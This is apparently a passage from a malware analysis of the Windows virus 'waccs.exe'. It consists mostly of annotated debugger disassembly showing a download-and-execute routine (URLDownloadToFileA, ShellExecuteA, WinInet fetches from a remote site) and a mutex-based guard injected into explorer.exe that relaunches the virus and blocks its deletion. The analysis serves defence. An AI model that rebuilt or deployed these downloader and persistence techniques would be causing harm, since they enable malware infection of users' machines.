00403A25 8DBD F0FDFFFF LEA EDI,DWORD PTR SS:[EBP-210]
00403A2B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00403A2D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00403A30 8985 E8FCFFFF MOV DWORD PTR SS:[EBP-318],EAX
00403A36 8B85 E8FCFFFF MOV EAX,DWORD PTR SS:[EBP-318]
00403A3C C600 01 MOV BYTE PTR DS:[EAX],1
00403A3F FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount
00403A45 50 PUSH EAX
00403A46 E8 01360000 CALL waccs.0040704C ; JMP to msvcrt.srand
00403A4B 59 POP ECX
00403A4C 68 04010000 PUSH 104
00403A51 6A 00 PUSH 0
00403A53 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403A59 50 PUSH EAX
00403A5A E8 DB350000 CALL waccs.0040703A ; JMP to msvcrt.memset
00403A5F 83C4 0C ADD ESP,0C
00403A62 68 04010000 PUSH 104
00403A67 6A 00 PUSH 0
00403A69 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403A6F 50 PUSH EAX
00403A70 E8 C5350000 CALL waccs.0040703A ; JMP to msvcrt.memset
00403A75 83C4 0C ADD ESP,0C
00403A78 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403A7E 50 PUSH EAX
00403A7F 68 04010000 PUSH 104
00403A84 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA
00403A8A E8 B7350000 CALL waccs.00407046 ; JMP to msvcrt.rand
00403A8F 99 CDQ
00403A90 6A 09 PUSH 9
00403A92 59 POP ECX
00403A93 F7F9 IDIV ECX
00403A95 52 PUSH EDX
00403A96 E8 AB350000 CALL waccs.00407046 ; JMP to msvcrt.rand
00403A9B 99 CDQ
00403A9C 6A 09 PUSH 9
00403A9E 59 POP ECX
00403A9F F7F9 IDIV ECX
00403AA1 52 PUSH EDX
00403AA2 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314]
00403AA8 50 PUSH EAX
00403AA9 68 D95B0021 PUSH 21005BD9
00403AAE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328]
00403AB4 E8 6C090000 CALL waccs.00404425
00403AB9 50 PUSH EAX
00403ABA 68 04010000 PUSH 104
00403ABF 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403AC5 50 PUSH EAX
00403AC6 E8 75350000 CALL waccs.00407040 ; JMP to msvcrt._snprintf
00403ACB 83C4 18 ADD ESP,18
00403ACE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328]
00403AD4 E8 9DE5FFFF CALL waccs.00402076
00403AD9 6A 00 PUSH 0
00403ADB 6A 00 PUSH 0
00403ADD 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403AE3 50 PUSH EAX
00403AE4 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F]
00403AEA 50 PUSH EAX
00403AEB 6A 00 PUSH 0
00403AED E8 C2360000 CALL waccs.004071B4 ; JMP to urlmon.URLDownloadToFileA
00403AF2 8985 E4FCFFFF MOV DWORD PTR SS:[EBP-31C],EAX
00403AF8 83BD E4FCFFFF 0>CMP DWORD PTR SS:[EBP-31C],0
00403AFF 75 6A JNZ SHORT waccs.00403B6B
00403B01 6A 00 PUSH 0
00403B03 6A 00 PUSH 0
00403B05 6A 00 PUSH 0
00403B07 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403B0D 50 PUSH EAX
00403B0E 68 AC9D4000 PUSH waccs.00409DAC ; ASCII "open"
00403B13 6A 00 PUSH 0
00403B15 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA
00403B1B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403B21 50 PUSH EAX
00403B22 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F]
00403B28 50 PUSH EAX
00403B29 68 B49D4000 PUSH waccs.00409DB4
00403B2E 68 B89D4000 PUSH waccs.00409DB8
00403B33 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108]
00403B39 05 D3000000 ADD EAX,0D3
00403B3E 50 PUSH EAX
00403B3F 68 D32B4F0A PUSH 0A4F2BD3
00403B44 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C]
00403B4A E8 36090000 CALL waccs.00404485
00403B4F 50 PUSH EAX
00403B50 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108]
00403B56 E8 A5D4FFFF CALL waccs.00401000
00403B5B 83C4 1C ADD ESP,1C
00403B5E 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C]
00403B64 E8 FC060000 CALL waccs.00404265
00403B69 EB 40 JMP SHORT waccs.00403BAB
00403B6B 68 E09D4000 PUSH waccs.00409DE0
00403B70 68 E49D4000 PUSH waccs.00409DE4
00403B75 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108]
00403B7B 05 D3000000 ADD EAX,0D3
00403B80 50 PUSH EAX
00403B81 68 4AF075C1 PUSH C175F04A
00403B86 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C]
00403B8C E8 54090000 CALL waccs.004044E5
00403B91 50 PUSH EAX
00403B92 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108]
00403B98 E8 63D4FFFF CALL waccs.00401000
00403B9D 83C4 14 ADD ESP,14
00403BA0 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C]
00403BA6 E8 E2060000 CALL waccs.0040428D
00403BAB 5F POP EDI
00403BAC 5E POP ESI
00403BAD C9 LEAVE
00403BAE C3 RETN ; Return.
Opening a connection, fetching information from a remote web site, and downloading and deleting the specified files:

00404CFE 55 PUSH EBP
00404CFF 8BEC MOV EBP,ESP
00404D01 B8 5C190000 MOV EAX,195C
00404D06 E8 55230000 CALL waccs.00407060
00404D0B 56 PUSH ESI
00404D0C 57 PUSH EDI
00404D0D 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
00404D10 B9 08010000 MOV ECX,108
00404D15 8DBD 3CE8FFFF LEA EDI,DWORD PTR SS:[EBP-17C4]
00404D1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00404D1D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00404D20 8985 28E8FFFF MOV DWORD PTR SS:[EBP-17D8],EAX
00404D26 8B85 28E8FFFF MOV EAX,DWORD PTR SS:[EBP-17D8]
00404D2C C600 01 MOV BYTE PTR DS:[EAX],1
00404D2F 83A5 68EEFFFF 0>AND DWORD PTR SS:[EBP-1198],0
00404D36 6A 63 PUSH 63
00404D38 59 POP ECX
00404D39 33C0 XOR EAX,EAX
00404D3B 8DBD 6CEEFFFF LEA EDI,DWORD PTR SS:[EBP-1194]
00404D41 F3:AB REP STOS DWORD PTR ES:[EDI]
00404D43 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004]
00404D49 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX
00404D4F 68 04010000 PUSH 104
00404D54 6A 00 PUSH 0
00404D56 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404D5C 50 PUSH EAX
00404D5D E8 D8220000 CALL waccs.0040703A ; JMP to msvcrt.memset
00404D62 83C4 0C ADD ESP,0C
00404D65 68 04010000 PUSH 104
00404D6A 6A 00 PUSH 0
00404D6C 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404D72 50 PUSH EAX
00404D73 E8 C2220000 CALL waccs.0040703A ; JMP to msvcrt.memset
00404D78 83C4 0C ADD ESP,0C
00404D7B 68 04010000 PUSH 104
00404D80 6A 00 PUSH 0
00404D82 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404D88 50 PUSH EAX
00404D89 E8 AC220000 CALL waccs.0040703A ; JMP to msvcrt.memset
00404D8E 83C4 0C ADD ESP,0C
00404D91 68 90010000 PUSH 190
00404D96 6A 00 PUSH 0
00404D98 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198]
00404D9E 50 PUSH EAX
00404D9F E8 96220000 CALL waccs.0040703A ; JMP to msvcrt.memset
00404DA4 83C4 0C ADD ESP,0C
00404DA7 83A5 20E8FFFF 0>AND DWORD PTR SS:[EBP-17E0],0
00404DAE 83A5 30E8FFFF 0>AND DWORD PTR SS:[EBP-17D0],0
00404DB5 83A5 F8EFFFFF 0>AND DWORD PTR SS:[EBP-1008],0
00404DBC 6A 00 PUSH 0
00404DBE 6A 00 PUSH 0
00404DC0 6A 00 PUSH 0
00404DC2 6A 00 PUSH 0
00404DC4 68 40084B19 PUSH 194B0840
00404DC9 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904]
00404DCF E8 A5040000 CALL waccs.00405279
00404DD4 50 PUSH EAX
00404DD5 FF15 B4814000 CALL DWORD PTR DS:[4081B4] ; WININET.InternetOpenA
00404DDB 8985 20E8FFFF MOV DWORD PTR SS:[EBP-17E0],EAX
00404DE1 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904]
00404DE7 E8 C2D1FFFF CALL waccs.00401FAE
00404DEC 83BD 20E8FFFF 0>CMP DWORD PTR SS:[EBP-17E0],0
00404DF3 75 05 JNZ SHORT waccs.00404DFA
00404DF5 E8 AE220000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
00404DFA 6A 00 PUSH 0
00404DFC 6A 00 PUSH 0
00404DFE 6A 00 PUSH 0
00404E00 6A 00 PUSH 0
00404E02 8D85 49EBFFFF LEA EAX,DWORD PTR SS:[EBP-14B7]
00404E08 50 PUSH EAX
00404E09 FFB5 20E8FFFF PUSH DWORD PTR SS:[EBP-17E0]
00404E0F FF15 B8814000 CALL DWORD PTR DS:[4081B8] ; WININET.InternetOpenUrlA
00404E15 8985 30E8FFFF MOV DWORD PTR SS:[EBP-17D0],EAX
00404E1B 83BD 30E8FFFF 0>CMP DWORD PTR SS:[EBP-17D0],0
00404E22 75 05 JNZ SHORT waccs.00404E29
00404E24 E8 7F220000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
00404E29 8D85 F8EFFFFF LEA EAX,DWORD PTR SS:[EBP-1008]
00404E2F 50 PUSH EAX
00404E30 68 00100000 PUSH 1000
00404E35 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004]
00404E3B 50 PUSH EAX
00404E3C FFB5 30E8FFFF PUSH DWORD PTR SS:[EBP-17D0]
00404E42 FF15 BC814000 CALL DWORD PTR DS:[4081BC] ; WININET.InternetReadFile
00404E48 85C0 TEST EAX,EAX
00404E4A 75 05 JNZ SHORT waccs.00404E51
00404E4C E8 57220000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
00404E51 83A5 18E7FFFF 0>AND DWORD PTR SS:[EBP-18E8],0
00404E58 68 DA43FADE PUSH DEFA43DA
00404E5D 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C]
00404E63 E8 71040000 CALL waccs.004052D9
00404E68 50 PUSH EAX
00404E69 FFB5 60EDFFFF PUSH DWORD PTR SS:[EBP-12A0]
00404E6F E8 DE210000 CALL waccs.00407052 ; JMP to msvcrt.strstr
00404E74 59 POP ECX
00404E75 59 POP ECX
00404E76 8985 34E8FFFF MOV DWORD PTR SS:[EBP-17CC],EAX
00404E7C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404E82 8985 F8E6FFFF MOV DWORD PTR SS:[EBP-1908],EAX
00404E88 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C]
00404E8E E8 36030000 CALL waccs.004051C9
00404E93 83BD F8E6FFFF 0>CMP DWORD PTR SS:[EBP-1908],0
00404E9A 74 38 JE SHORT waccs.00404ED4
00404E9C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404EA2 8020 00 AND BYTE PTR DS:[EAX],0
00404EA5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8]
00404EAB 8B8D 60EDFFFF MOV ECX,DWORD PTR SS:[EBP-12A0]
00404EB1 898C85 68EEFFFF MOV DWORD PTR SS:[EBP+EAX*4-1198],ECX
00404EB8 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC]
00404EBE 40 INC EAX
00404EBF 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX
00404EC5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8]
00404ECB 40 INC EAX
00404ECC 8985 18E7FFFF MOV DWORD PTR SS:[EBP-18E8],EAX
00404ED2 ^ EB 84 JMP SHORT waccs.00404E58
00404ED4 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404EDA 50 PUSH EAX
00404EDB 68 04010000 PUSH 104
00404EE0 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA
00404EE6 8D85 45EAFFFF LEA EAX,DWORD PTR SS:[EBP-15BB]
00404EEC 50 PUSH EAX
00404EED 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404EF3 50 PUSH EAX
00404EF4 68 23B863A8 PUSH A863B823
00404EF9 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914]
00404EFF E8 35040000 CALL waccs.00405339
00404F04 50 PUSH EAX
00404F05 68 04010000 PUSH 104
00404F0A 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F10 50 PUSH EAX
00404F11 E8 2A210000 CALL waccs.00407040 ; JMP to msvcrt._snprintf
00404F16 83C4 14 ADD ESP,14
00404F19 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914]
00404F1F E8 02D1FFFF CALL waccs.00402026
00404F24 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F2A 50 PUSH EAX
00404F2B E8 BFF0FFFF CALL waccs.00403FEF
00404F30 59 POP ECX
00404F31 0FB6C0 MOVZX EAX,AL
00404F34 85C0 TEST EAX,EAX
00404F36 74 0D JE SHORT waccs.00404F45
00404F38 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404F3E 50 PUSH EAX
00404F3F FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA
00404F45 0FBE85 3DE8FFFF MOVSX EAX,BYTE PTR SS:[EBP-17C3]
00404F4C 85C0 TEST EAX,EAX
00404F4E 0F84 B5000000 JE waccs.00405009
00404F54 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount
00404F5A 50 PUSH EAX
00404F5B E8 EC200000 CALL waccs.0040704C ; JMP to msvcrt.srand
00404F60 59 POP ECX
00404F61 E8 E0200000 CALL waccs.00407046 ; JMP to msvcrt.rand
00404F66 99 CDQ
00404F67 6A 09 PUSH 9
00404F69 59 POP ECX
00404F6A F7F9 IDIV ECX
00404F6C 52 PUSH EDX
00404F6D E8 D4200000 CALL waccs.00407046 ; JMP to msvcrt.rand
00404F72 99 CDQ
00404F73 6A 09 PUSH 9
00404F75 59 POP ECX
00404F76 F7F9 IDIV ECX
00404F78 52 PUSH EDX
00404F79 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4]
00404F7F 50 PUSH EAX
00404F80 68 EADFCD01 PUSH 1CDDFEA
00404F85 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920]
00404F8B E8 09040000 CALL waccs.00405399
00404F90 50 PUSH EAX
00404F91 68 04010000 PUSH 104
00404F96 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404F9C 50 PUSH EAX
00404F9D E8 9E200000 CALL waccs.00407040 ; JMP to msvcrt._snprintf
00404FA2 83C4 18 ADD ESP,18
00404FA5 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920]
00404FAB E8 C6D0FFFF CALL waccs.00402076
00404FB0 6A 00 PUSH 0
00404FB2 6A 00 PUSH 0
00404FB4 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404FBA 50 PUSH EAX
00404FBB 8D85 3DE8FFFF LEA EAX,DWORD PTR SS:[EBP-17C3]
00404FC1 50 PUSH EAX
00404FC2 6A 00 PUSH 0
00404FC4 E8 EB210000 CALL waccs.004071B4 ; JMP to urlmon.URLDownloadToFileA
00404FC9 8985 24E8FFFF MOV DWORD PTR SS:[EBP-17DC],EAX
00404FCF 83BD 24E8FFFF 0>CMP DWORD PTR SS:[EBP-17DC],0
00404FD6 74 05 JE SHORT waccs.00404FDD
00404FD8 E8 CB200000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
00404FDD 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF]
00404FE3 50 PUSH EAX
00404FE4 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00404FEA 50 PUSH EAX
00404FEB 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00404FF1 50 PUSH EAX
00404FF2 E8 181B0000 CALL waccs.00406B0F
00404FF7 83C4 0C ADD ESP,0C
00404FFA 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405000 50 PUSH EAX
00405001 FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA
00405007 EB 38 JMP SHORT waccs.00405041
00405009 68 04010000 PUSH 104
0040500E 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405014 50 PUSH EAX
00405015 6A 00 PUSH 0
00405017 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
0040501D 50 PUSH EAX
0040501E FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA
00405024 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF]
0040502A 50 PUSH EAX
0040502B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405031 50 PUSH EAX
00405032 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C]
00405038 50 PUSH EAX
00405039 E8 D11A0000 CALL waccs.00406B0F
0040503E 83C4 0C ADD ESP,0C
00405041 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405047 50 PUSH EAX
00405048 E8 A2EFFFFF CALL waccs.00403FEF
0040504D 59 POP ECX
0040504E 0FB6C0 MOVZX EAX,AL
00405051 85C0 TEST EAX,EAX
00405053 75 05 JNZ SHORT waccs.0040505A
00405055 E8 4E200000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
0040505A FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount
00405060 8985 38E8FFFF MOV DWORD PTR SS:[EBP-17C8],EAX
00405066 8B85 50ECFFFF MOV EAX,DWORD PTR SS:[EBP-13B0]
0040506C 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
0040506F EB 07 JMP SHORT waccs.00405078
00405071 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00405074 48 DEC EAX
00405075 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
00405078 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
0040507C 7E 38 JLE SHORT waccs.004050B6
0040507E FFB5 18E7FFFF PUSH DWORD PTR SS:[EBP-18E8]
00405084 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198]
0040508A 50 PUSH EAX
0040508B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4]
00405091 50 PUSH EAX
00405092 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8]
00405098 E8 ECF8FFFF CALL waccs.00404989
0040509D 83C4 10 ADD ESP,10
004050A0 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004050A3 48 DEC EAX
004050A4 85C0 TEST EAX,EAX
004050A6 7E 0C JLE SHORT waccs.004050B4
004050A8 FFB5 54ECFFFF PUSH DWORD PTR SS:[EBP-13AC]
004050AE FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep
004050B4 ^ EB BB JMP SHORT waccs.00405071
004050B6 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount
004050BC 8985 2CE8FFFF MOV DWORD PTR SS:[EBP-17D4],EAX
004050C2 8B85 2CE8FFFF MOV EAX,DWORD PTR SS:[EBP-17D4]
004050C8 2B85 38E8FFFF SUB EAX,DWORD PTR SS:[EBP-17C8]
004050CE 99 CDQ
004050CF B9 60EA0000 MOV ECX,0EA60
004050D4 F7F9 IDIV ECX
004050D6 50 PUSH EAX
004050D7 FFB5 50ECFFFF PUSH DWORD PTR SS:[EBP-13B0]
004050DD 68 449F4000 PUSH waccs.00409F44
004050E2 68 489F4000 PUSH waccs.00409F48
004050E7 8B85 58ECFFFF MOV EAX,DWORD PTR SS:[EBP-13A8]
004050ED 05 D3000000 ADD EAX,0D3
004050F2 50 PUSH EAX
004050F3 68 26E784BB PUSH BB84E726
004050F8 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C]
004050FE E8 F6020000 CALL waccs.004053F9
00405103 50 PUSH EAX
00405104 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8]
0040510A E8 F1BEFFFF CALL waccs.00401000
0040510F 83C4 1C ADD ESP,1C
00405112 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C]
00405118 E8 D4000000 CALL waccs.004051F1
0040511D E8 861F0000 CALL waccs.004070A8 ; JMP to msvcrt._endthread
00405122 5F POP EDI
00405123 5E POP ESI
00405124 C9 LEAVE
00405125 C3 RETN ; Return.
----------------------------------------------------------
----------------------------------------------------------------------------------------------------
----------------------------------------------------------
3. Analysis of the malicious code the virus injects into the system desktop process "explorer.exe":

Injected code segment:
[Process-guard function: it runs the check below in a loop and uses the mutex name to decide whether the main virus program is running; as soon as the virus's mutex no longer exists (the process was terminated), it relaunches the virus program.]

01A50000 55 PUSH EBP ; Entry point of the injected code.
01A50001 8BEC MOV EBP,ESP
01A50003 83EC 08 SUB ESP,8
01A50006 6A 00 PUSH 0 ; /hTemplateFile = NULL
01A50008 68 80000000 PUSH 80 ; |Attributes = NORMAL
01A5000D 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
01A5000F 6A 00 PUSH 0 ; |pSecurity = NULL
01A50011 6A 01 PUSH 1 ; |ShareMode = FILE_SHARE_READ
01A50013 68 00000080 PUSH 80000000 ; |Access = GENERIC_READ
01A50018 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A5001B 83C0 1C ADD EAX,1C
01A5001E 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe"
01A5001F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
01A50022 FF51 04 CALL DWORD PTR DS:[ECX+4] ; kernel32.CreateFileA (open the main virus file with share mode read-only so that the user or security software cannot delete it).
01A50025 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
01A50028 BA 01000000 MOV EDX,1
01A5002D 85D2 TEST EDX,EDX ; Check the function's return value.
01A5002F 74 72 JE SHORT 01A500A3 ; If the file does not exist, leave the loop.
01A50031 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A50034 05 20010000 ADD EAX,120
01A50039 50 PUSH EAX ; /MutexName = "t3x0"
01A5003A 6A 00 PUSH 0 ; |InitialOwner = FALSE
01A5003C 6A 00 PUSH 0 ; |pSecurity = NULL
01A5003E 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
01A50041 FF51 08 CALL DWORD PTR DS:[ECX+8] ; kernel32.CreateMutexA
01A50044 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
01A50047 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
01A5004A FF52 0C CALL DWORD PTR DS:[EDX+C] ; ntdll.RtlGetLastWin32Error
01A5004D 3D B7000000 CMP EAX,0B7
01A50052 74 2F JE SHORT 01A50083 ; Check whether the virus process is still running.
01A50054 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] ; Execution continues here once the virus process is found to be gone.
01A50057 50 PUSH EAX
01A50058 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
01A5005B FF11 CALL DWORD PTR DS:[ECX] ; kernel32.CloseHandle (close the handle).
01A5005D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
01A50060 52 PUSH EDX
01A50061 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A50064 FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex (release the mutex owned by the thread).
01A50067 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
01A5006A 51 PUSH ECX
01A5006B 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
01A5006E FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle (close the handle).
01A50070 6A 00 PUSH 0
01A50072 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A50075 83C0 1C ADD EAX,1C
01A50078 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe"
01A50079 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
01A5007C FF51 18 CALL DWORD PTR DS:[ECX+18] ; kernel32.WinExec (relaunch the virus program).
01A5007F 33C0 XOR EAX,EAX
01A50081 EB 22 JMP SHORT 01A500A5 ; Leave the loop.
01A50083 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
01A50086 52 PUSH EDX
01A50087 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A5008A FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex (release the mutex owned by the thread).
01A5008D 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
01A50090 51 PUSH ECX
01A50091 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
01A50094 FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle (close the handle).
01A50096 68 10270000 PUSH 2710
01A5009B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
01A5009E FF50 14 CALL DWORD PTR DS:[EAX+14] ; kernel32.Sleep (wait).
01A500A1 ^ EB 85 JMP SHORT 01A50028 ; Loop back and run the check again.
01A500A3 33C0 XOR EAX,EAX
01A500A5 8BE5 MOV ESP,EBP
01A500A7 5D POP EBP
01A500A8 C2 0400 RETN 4 ; Return (exit).

Injected data segment:

0012F550 47 9B 80 7C 24 1A 80 7C  G..|$..|
0012F558 3F E9 80 7C 31 03 93 7C  ?..|1..|
0012F560 A7 24 80 7C 42 24 80 7C  .$.|B$.|
0012F568 6D 13 86 7C 43 3A 5C 57  m..|C:\W
0012F570 49 4E 44 4F 57 53 5C 73  INDOWS\s
0012F578 79 73 74 65 6D 33 32 5C  ystem32\
0012F580 77 61 63 63 73 2E 65 78  waccs.ex
0012F588 65 00 00 00 00 00 00 00  e.......
0012F590 00 00 00 00 00 00 00 00  ........
0012F598 00 00 00 00 00 00 00 00  ........
0012F5A0 00 00 00 00 00 00 00 00  ........
0012F5A8 00 00 00 00 00 00 00 00  ........
0012F5B0 00 00 00 00 00 00 00 00  ........
0012F5B8 00 00 00 00 00 00 00 00  ........
0012F5C0 00 00 00 00 00 00 00 00  ........
0012F5C8 00 00 00 00 00 00 00 00  ........
0012F5D0 00 00 00 00 00 00 00 00  ........
0012F5D8 00 00 00 00 00 00 00 00  ........
0012F5E0 00 00 00 00 00 00 00 00  ........
0012F5E8 00 00 00 00 00 00 00 00  ........
0012F5F0 00 00 00 00 00 00 00 00  ........
0012F5F8 00 00 00 00 00 00 00 00  ........
0012F600 00 00 00 00 00 00 00 00  ........
0012F608 00 00 00 00 00 00 00 00  ........
0012F610 00 00 00 00 00 00 00 00  ........
0012F618 00 00 00 00 00 00 00 00  ........
0012F620 00 00 00 00 00 00 00 00  ........
0012F628 00 00 00 00 00 00 00 00  ........
0012F630 00 00 00 00 00 00 00 00  ........
0012F638 00 00 00 00 00 00 00 00  ........
0012F640 00 00 00 00 00 00 00 00  ........
0012F648 00 00 00 00 00 00 00 00  ........
0012F650 00 00 00 00 00 00 00 00  ........
0012F658 00 00 00 00 00 00 00 00  ........
0012F660 00 00 00 00 00 00 00 00  ........
0012F668 00 00 00 00 00 00 00 00  ........
0012F670 74 33 78 30 00 00 00 00  t3x0....
0012F678 00 00 00 00 00 00 00 00  ........
0012F680 00 00 00 00 00 00 00 00  ........
0012F688 00 00 00 00 00 00 00 00  ........
0012F690 00 00 00 00 00 00 00 00  ........
0012F698 00 00 00 00 00 00 00 00  ........
0012F6A0 00 00 00 00 00 00 00 00  ........
0012F6A8 00 00 00 00 00 00 00 00  ........
0012F6B0 00                       .
----------------------------------------------------------
Injected data segment (raw bytes):
47 9B 80 7C 24 1A 80 7C 3F E9 80 7C 31 03 93 7C
A7 24 80 7C 42 24 80 7C 6D 13 86 7C 43 3A 5C 57
49 4E 44 4F 57 53 5C 73 79 73 74 65 6D 33 32 5C
77 61 63 63 73 2E 65 78 65 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
